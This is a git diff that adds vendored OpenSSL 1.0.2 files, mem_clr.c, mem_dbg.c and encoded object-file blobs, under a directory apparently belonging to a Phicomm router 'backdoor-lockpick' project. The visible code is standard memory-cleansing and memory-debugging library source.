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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/mem_clr.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/mem_clr.c
new file mode 100644
index 0000000..3df1f39
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/mem_clr.c
@@ -0,0 +1,77 @@
+/* crypto/mem_clr.c -*- mode:C; c-file-style: "eay" -*- */
+/*
+ * Written by Geoff Thorpe (geoff@geoffthorpe.net) for the OpenSSL project
+ * 2002.
+ */
+/* ====================================================================
+ * Copyright (c) 2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <string.h>
+#include <openssl/crypto.h>
+
+unsigned char cleanse_ctr = 0;
+
+void OPENSSL_cleanse(void *ptr, size_t len)
+{
+    unsigned char *p = ptr;
+    size_t loop = len, ctr = cleanse_ctr;
+    while (loop--) {
+        *(p++) = (unsigned char)ctr;
+        ctr += (17 + ((size_t)p & 0xF));
+    }
+    p = memchr(ptr, (unsigned char)ctr, len);
+    if (p)
+        ctr += (63 + (size_t)p);
+    cleanse_ctr = (unsigned char)ctr;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/mem_clr.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/mem_clr.o
new file mode 100644
index 0000000000000000000000000000000000000000..8123169234565ea23f873925ea0a3c721d2f8687
GIT binary patch
literal 1696
zcmbtU&1(};5T9gQTQxR`dJw9TlONPRl2+&ksA+1FMM5K{1wm!q#MOZLD7!DvdeB1=
zl0%{Yi%>j91pkKq1B&29?L|b0Gn+TbX5E||n9j^^=l5pb%uC;73%PJ81S}!A4a100
zfT!BfPrGg!&Oii?qnCe|qKB6V(mOx({m7Eu`4v4p)>l5rb9%4ae%RAHpZ2~)_5H_-
z@o%5Mx|wggauNaUPTOTZ`Uv^;_0`0+t#Yd&TZt91D3bH3rIs6}UN0m?^5*qE>=uU!
zG%?gk)cnR4gaNvQahvDSCkefJ0HK{&Xf`r6eSjCch!`n}PJgm9vAu9OGc!%Wc%hk0
zz>i)~h88$6>V>-*Wod5rqZmaRocI@X@u@L*aMPMQl~KxR49|M{bnlMXENa}-5AXge
z;xu2s+(IA-hq_faDm7bFpm;yKQ7RQMvdo5KfwD$L+F;}h#mrj4DCTmd?544~mMLTn
z;#R7*TZ(Ul`-D@de|mjcaKF+H0AJk@&nVoVpYY)HZ6LzgtxK~E!jX30R@t+ynkl5U
zBSAbfr3s?!I3Oy`dfjRu)@Vvg;9Hw_q*-~X;unpU*tVP7mMwQdxF=Xu<GF3ttwG8E
zaS}+To%mly8Zi>yV?XNWvQL)wOEXKOdgVY3h50mVs>AcYppvgB-2al>>bu|Y`(gYB
zI&|hZzCYg|r;tln64fhQf6fb{&wRG49?YBi&Kr1q<}q{+9s2c+ydjL=tAvEIY<PYg
zm(ig!{rn@9u*`|d`uR@~58B_6I*|87`y(#%84s#WrDE!$%gWOKhm!$(!u-2K2y|8d
YE(IP@#|@A;dO`f}ieDRK_8mX}FMQ>amH+?%

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/mem_dbg.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/mem_dbg.c
new file mode 100644
index 0000000..8525ded
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/mem_dbg.c
@@ -0,0 +1,830 @@
+/* crypto/mem_dbg.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <time.h>
+#include "cryptlib.h"
+#include <openssl/crypto.h>
+#include <openssl/buffer.h>
+#include <openssl/bio.h>
+#include <openssl/lhash.h>
+
+static int mh_mode = CRYPTO_MEM_CHECK_OFF;
+/*
+ * The state changes to CRYPTO_MEM_CHECK_ON | CRYPTO_MEM_CHECK_ENABLE when
+ * the application asks for it (usually after library initialisation for
+ * which no book-keeping is desired). State CRYPTO_MEM_CHECK_ON exists only
+ * temporarily when the library thinks that certain allocations should not be
+ * checked (e.g. the data structures used for memory checking).  It is not
+ * suitable as an initial state: the library will unexpectedly enable memory
+ * checking when it executes one of those sections that want to disable
+ * checking temporarily. State CRYPTO_MEM_CHECK_ENABLE without ..._ON makes
+ * no sense whatsoever.
+ */
+
+static unsigned long order = 0; /* number of memory requests */
+
+DECLARE_LHASH_OF(MEM);
+static LHASH_OF(MEM) *mh = NULL; /* hash-table of memory requests (address as
+                                  * key); access requires MALLOC2 lock */
+
+typedef struct app_mem_info_st
+/*-
+ * For application-defined information (static C-string `info')
+ * to be displayed in memory leak list.
+ * Each thread has its own stack.  For applications, there is
+ *   CRYPTO_push_info("...")     to push an entry,
+ *   CRYPTO_pop_info()           to pop an entry,
+ *   CRYPTO_remove_all_info()    to pop all entries.
+ */
+{
+    CRYPTO_THREADID threadid;
+    const char *file;
+    int line;
+    const char *info;
+    struct app_mem_info_st *next; /* tail of thread's stack */
+    int references;
+} APP_INFO;
+
+static void app_info_free(APP_INFO *);
+
+DECLARE_LHASH_OF(APP_INFO);
+static LHASH_OF(APP_INFO) *amih = NULL; /* hash-table with those
+                                         * app_mem_info_st's that are at the
+                                         * top of their thread's stack (with
+                                         * `thread' as key); access requires
+                                         * MALLOC2 lock */
+
+typedef struct mem_st
+/* memory-block description */
+{
+    void *addr;
+    int num;
+    const char *file;
+    int line;
+    CRYPTO_THREADID threadid;
+    unsigned long order;
+    time_t time;
+    APP_INFO *app_info;
+} MEM;
+
+static long options =           /* extra information to be recorded */
+#if defined(CRYPTO_MDEBUG_TIME) || defined(CRYPTO_MDEBUG_ALL)
+    V_CRYPTO_MDEBUG_TIME |
+#endif
+#if defined(CRYPTO_MDEBUG_THREAD) || defined(CRYPTO_MDEBUG_ALL)
+    V_CRYPTO_MDEBUG_THREAD |
+#endif
+    0;
+
+static unsigned int num_disable = 0; /* num_disable > 0 iff mh_mode ==
+                                      * CRYPTO_MEM_CHECK_ON (w/o ..._ENABLE) */
+
+/*
+ * Valid iff num_disable > 0.  CRYPTO_LOCK_MALLOC2 is locked exactly in this
+ * case (by the thread named in disabling_thread).
+ */
+static CRYPTO_THREADID disabling_threadid;
+
+static void app_info_free(APP_INFO *inf)
+{
+    if (--(inf->references) <= 0) {
+        if (inf->next != NULL) {
+            app_info_free(inf->next);
+        }
+        OPENSSL_free(inf);
+    }
+}
+
+int CRYPTO_mem_ctrl(int mode)
+{
+    int ret = mh_mode;
+
+    CRYPTO_w_lock(CRYPTO_LOCK_MALLOC);
+    switch (mode) {
+        /*
+         * for applications (not to be called while multiple threads use the
+         * library):
+         */
+    case CRYPTO_MEM_CHECK_ON:  /* aka MemCheck_start() */
+        mh_mode = CRYPTO_MEM_CHECK_ON | CRYPTO_MEM_CHECK_ENABLE;
+        num_disable = 0;
+        break;
+    case CRYPTO_MEM_CHECK_OFF: /* aka MemCheck_stop() */
+        mh_mode = 0;
+        num_disable = 0;        /* should be true *before* MemCheck_stop is
+                                 * used, or there'll be a lot of confusion */
+        break;
+
+        /* switch off temporarily (for library-internal use): */
+    case CRYPTO_MEM_CHECK_DISABLE: /* aka MemCheck_off() */
+        if (mh_mode & CRYPTO_MEM_CHECK_ON) {
+            CRYPTO_THREADID cur;
+            CRYPTO_THREADID_current(&cur);
+            /* see if we don't have the MALLOC2 lock already */
+            if (!num_disable
+                || CRYPTO_THREADID_cmp(&disabling_threadid, &cur)) {
+                /*
+                 * Long-time lock CRYPTO_LOCK_MALLOC2 must not be claimed
+                 * while we're holding CRYPTO_LOCK_MALLOC, or we'll deadlock
+                 * if somebody else holds CRYPTO_LOCK_MALLOC2 (and cannot
+                 * release it because we block entry to this function). Give
+                 * them a chance, first, and then claim the locks in
+                 * appropriate order (long-time lock first).
+                 */
+                CRYPTO_w_unlock(CRYPTO_LOCK_MALLOC);
+                /*
+                 * Note that after we have waited for CRYPTO_LOCK_MALLOC2 and
+                 * CRYPTO_LOCK_MALLOC, we'll still be in the right "case" and
+                 * "if" branch because MemCheck_start and MemCheck_stop may
+                 * never be used while there are multiple OpenSSL threads.
+                 */
+                CRYPTO_w_lock(CRYPTO_LOCK_MALLOC2);
+                CRYPTO_w_lock(CRYPTO_LOCK_MALLOC);
+                mh_mode &= ~CRYPTO_MEM_CHECK_ENABLE;
+                CRYPTO_THREADID_cpy(&disabling_threadid, &cur);
+            }
+            num_disable++;
+        }
+        break;
+    case CRYPTO_MEM_CHECK_ENABLE: /* aka MemCheck_on() */
+        if (mh_mode & CRYPTO_MEM_CHECK_ON) {
+            if (num_disable) {  /* always true, or something is going wrong */
+                num_disable--;
+                if (num_disable == 0) {
+                    mh_mode |= CRYPTO_MEM_CHECK_ENABLE;
+                    CRYPTO_w_unlock(CRYPTO_LOCK_MALLOC2);
+                }
+            }
+        }
+        break;
+
+    default:
+        break;
+    }
+    CRYPTO_w_unlock(CRYPTO_LOCK_MALLOC);
+    return (ret);
+}
+
+int CRYPTO_is_mem_check_on(void)
+{
+    int ret = 0;
+
+    if (mh_mode & CRYPTO_MEM_CHECK_ON) {
+        CRYPTO_THREADID cur;
+        CRYPTO_THREADID_current(&cur);
+        CRYPTO_r_lock(CRYPTO_LOCK_MALLOC);
+
+        ret = (mh_mode & CRYPTO_MEM_CHECK_ENABLE)
+            || CRYPTO_THREADID_cmp(&disabling_threadid, &cur);
+
+        CRYPTO_r_unlock(CRYPTO_LOCK_MALLOC);
+    }
+    return (ret);
+}
+
+void CRYPTO_dbg_set_options(long bits)
+{
+    options = bits;
+}
+
+long CRYPTO_dbg_get_options(void)
+{
+    return options;
+}
+
+static int mem_cmp(const MEM *a, const MEM *b)
+{
+#ifdef _WIN64
+    const char *ap = (const char *)a->addr, *bp = (const char *)b->addr;
+    if (ap == bp)
+        return 0;
+    else if (ap > bp)
+        return 1;
+    else
+        return -1;
+#else
+    return (const char *)a->addr - (const char *)b->addr;
+#endif
+}
+
+static IMPLEMENT_LHASH_COMP_FN(mem, MEM)
+
+static unsigned long mem_hash(const MEM *a)
+{
+    unsigned long ret;
+
+    ret = (unsigned long)a->addr;
+
+    ret = ret * 17851 + (ret >> 14) * 7 + (ret >> 4) * 251;
+    return (ret);
+}
+
+static IMPLEMENT_LHASH_HASH_FN(mem, MEM)
+
+/* static int app_info_cmp(APP_INFO *a, APP_INFO *b) */
+static int app_info_cmp(const void *a_void, const void *b_void)
+{
+    return CRYPTO_THREADID_cmp(&((const APP_INFO *)a_void)->threadid,
+                               &((const APP_INFO *)b_void)->threadid);
+}
+
+static IMPLEMENT_LHASH_COMP_FN(app_info, APP_INFO)
+
+static unsigned long app_info_hash(const APP_INFO *a)
+{
+    unsigned long ret;
+
+    ret = CRYPTO_THREADID_hash(&a->threadid);
+    /* This is left in as a "who am I to question legacy?" measure */
+    ret = ret * 17851 + (ret >> 14) * 7 + (ret >> 4) * 251;
+    return (ret);
+}
+
+static IMPLEMENT_LHASH_HASH_FN(app_info, APP_INFO)
+
+static APP_INFO *pop_info(void)
+{
+    APP_INFO tmp;
+    APP_INFO *ret = NULL;
+
+    if (amih != NULL) {
+        CRYPTO_THREADID_current(&tmp.threadid);
+        if ((ret = lh_APP_INFO_delete(amih, &tmp)) != NULL) {
+            APP_INFO *next = ret->next;
+
+            if (next != NULL) {
+                next->references++;
+                (void)lh_APP_INFO_insert(amih, next);
+            }
+#ifdef LEVITTE_DEBUG_MEM
+            if (CRYPTO_THREADID_cmp(&ret->threadid, &tmp.threadid)) {
+                fprintf(stderr,
+                        "pop_info(): deleted info has other thread ID (%lu) than the current thread (%lu)!!!!\n",
+                        CRYPTO_THREADID_hash(&ret->threadid),
+                        CRYPTO_THREADID_hash(&tmp.threadid));
+                abort();
+            }
+#endif
+            if (--(ret->references) <= 0) {
+                ret->next = NULL;
+                if (next != NULL)
+                    next->references--;
+                OPENSSL_free(ret);
+            }
+        }
+    }
+    return (ret);
+}
+
+int CRYPTO_push_info_(const char *info, const char *file, int line)
+{
+    APP_INFO *ami, *amim;
+    int ret = 0;
+
+    if (is_MemCheck_on()) {
+        MemCheck_off();         /* obtain MALLOC2 lock */
+
+        if ((ami = (APP_INFO *)OPENSSL_malloc(sizeof(APP_INFO))) == NULL) {
+            ret = 0;
+            goto err;
+        }
+        if (amih == NULL) {
+            if ((amih = lh_APP_INFO_new()) == NULL) {
+                OPENSSL_free(ami);
+                ret = 0;
+                goto err;
+            }
+        }
+
+        CRYPTO_THREADID_current(&ami->threadid);
+        ami->file = file;
+        ami->line = line;
+        ami->info = info;
+        ami->references = 1;
+        ami->next = NULL;
+
+        if ((amim = lh_APP_INFO_insert(amih, ami)) != NULL) {
+#ifdef LEVITTE_DEBUG_MEM
+            if (CRYPTO_THREADID_cmp(&ami->threadid, &amim->threadid)) {
+                fprintf(stderr,
+                        "CRYPTO_push_info(): previous info has other thread ID (%lu) than the current thread (%lu)!!!!\n",
+                        CRYPTO_THREADID_hash(&amim->threadid),
+                        CRYPTO_THREADID_hash(&ami->threadid));
+                abort();
+            }
+#endif
+            ami->next = amim;
+        }
+ err:
+        MemCheck_on();          /* release MALLOC2 lock */
+    }
+
+    return (ret);
+}
+
+int CRYPTO_pop_info(void)
+{
+    int ret = 0;
+
+    if (is_MemCheck_on()) {     /* _must_ be true, or something went severely
+                                 * wrong */
+        MemCheck_off();         /* obtain MALLOC2 lock */
+
+        ret = (pop_info() != NULL);
+
+        MemCheck_on();          /* release MALLOC2 lock */
+    }
+    return (ret);
+}
+
+int CRYPTO_remove_all_info(void)
+{
+    int ret = 0;
+
+    if (is_MemCheck_on()) {     /* _must_ be true */
+        MemCheck_off();         /* obtain MALLOC2 lock */
+
+        while (pop_info() != NULL)
+            ret++;
+
+        MemCheck_on();          /* release MALLOC2 lock */
+    }
+    return (ret);
+}
+
+static unsigned long break_order_num = 0;
+void CRYPTO_dbg_malloc(void *addr, int num, const char *file, int line,
+                       int before_p)
+{
+    MEM *m, *mm;
+    APP_INFO tmp, *amim;
+
+    switch (before_p & 127) {
+    case 0:
+        break;
+    case 1:
+        if (addr == NULL)
+            break;
+
+        if (is_MemCheck_on()) {
+            MemCheck_off();     /* make sure we hold MALLOC2 lock */
+            if ((m = (MEM *)OPENSSL_malloc(sizeof(MEM))) == NULL) {
+                OPENSSL_free(addr);
+                MemCheck_on();  /* release MALLOC2 lock if num_disabled drops
+                                 * to 0 */
+                return;
+            }
+            if (mh == NULL) {
+                if ((mh = lh_MEM_new()) == NULL) {
+                    OPENSSL_free(addr);
+                    OPENSSL_free(m);
+                    addr = NULL;
+                    goto err;
+                }
+            }
+
+            m->addr = addr;
+            m->file = file;
+            m->line = line;
+            m->num = num;
+            if (options & V_CRYPTO_MDEBUG_THREAD)
+                CRYPTO_THREADID_current(&m->threadid);
+            else
+                memset(&m->threadid, 0, sizeof(m->threadid));
+
+            if (order == break_order_num) {
+                /* BREAK HERE */
+                m->order = order;
+            }
+            m->order = order++;
+#ifdef LEVITTE_DEBUG_MEM
+            fprintf(stderr, "LEVITTE_DEBUG_MEM: [%5ld] %c 0x%p (%d)\n",
+                    m->order, (before_p & 128) ? '*' : '+', m->addr, m->num);
+#endif
+            if (options & V_CRYPTO_MDEBUG_TIME)
+                m->time = time(NULL);
+            else
+                m->time = 0;
+
+            CRYPTO_THREADID_current(&tmp.threadid);
+            m->app_info = NULL;
+            if (amih != NULL
+                && (amim = lh_APP_INFO_retrieve(amih, &tmp)) != NULL) {
+                m->app_info = amim;
+                amim->references++;
+            }
+
+            if ((mm = lh_MEM_insert(mh, m)) != NULL) {
+                /* Not good, but don't sweat it */
+                if (mm->app_info != NULL) {
+                    mm->app_info->references--;
+                }
+                OPENSSL_free(mm);
+            }
+ err:
+            MemCheck_on();      /* release MALLOC2 lock if num_disabled drops
+                                 * to 0 */
+        }
+        break;
+    }
+    return;
+}
+
+void CRYPTO_dbg_free(void *addr, int before_p)
+{
+    MEM m, *mp;
+
+    switch (before_p) {
+    case 0:
+        if (addr == NULL)
+            break;
+
+        if (is_MemCheck_on() && (mh != NULL)) {
+            MemCheck_off();     /* make sure we hold MALLOC2 lock */
+
+            m.addr = addr;
+            mp = lh_MEM_delete(mh, &m);
+            if (mp != NULL) {
+#ifdef LEVITTE_DEBUG_MEM
+                fprintf(stderr, "LEVITTE_DEBUG_MEM: [%5ld] - 0x%p (%d)\n",
+                        mp->order, mp->addr, mp->num);
+#endif
+                if (mp->app_info != NULL)
+                    app_info_free(mp->app_info);
+                OPENSSL_free(mp);
+            }
+
+            MemCheck_on();      /* release MALLOC2 lock if num_disabled drops
+                                 * to 0 */
+        }
+        break;
+    case 1:
+        break;
+    }
+}
+
+void CRYPTO_dbg_realloc(void *addr1, void *addr2, int num,
+                        const char *file, int line, int before_p)
+{
+    MEM m, *mp;
+
+#ifdef LEVITTE_DEBUG_MEM
+    fprintf(stderr,
+            "LEVITTE_DEBUG_MEM: --> CRYPTO_dbg_malloc(addr1 = %p, addr2 = %p, num = %d, file = \"%s\", line = %d, before_p = %d)\n",
+            addr1, addr2, num, file, line, before_p);
+#endif
+
+    switch (before_p) {
+    case 0:
+        break;
+    case 1:
+        if (addr2 == NULL)
+            break;
+
+        if (addr1 == NULL) {
+            CRYPTO_dbg_malloc(addr2, num, file, line, 128 | before_p);
+            break;
+        }
+
+        if (is_MemCheck_on()) {
+            MemCheck_off();     /* make sure we hold MALLOC2 lock */
+
+            m.addr = addr1;
+            mp = lh_MEM_delete(mh, &m);
+            if (mp != NULL) {
+#ifdef LEVITTE_DEBUG_MEM
+                fprintf(stderr,
+                        "LEVITTE_DEBUG_MEM: [%5ld] * 0x%p (%d) -> 0x%p (%d)\n",
+                        mp->order, mp->addr, mp->num, addr2, num);
+#endif
+                mp->addr = addr2;
+                mp->num = num;
+                (void)lh_MEM_insert(mh, mp);
+            }
+
+            MemCheck_on();      /* release MALLOC2 lock if num_disabled drops
+                                 * to 0 */
+        }
+        break;
+    }
+    return;
+}
+
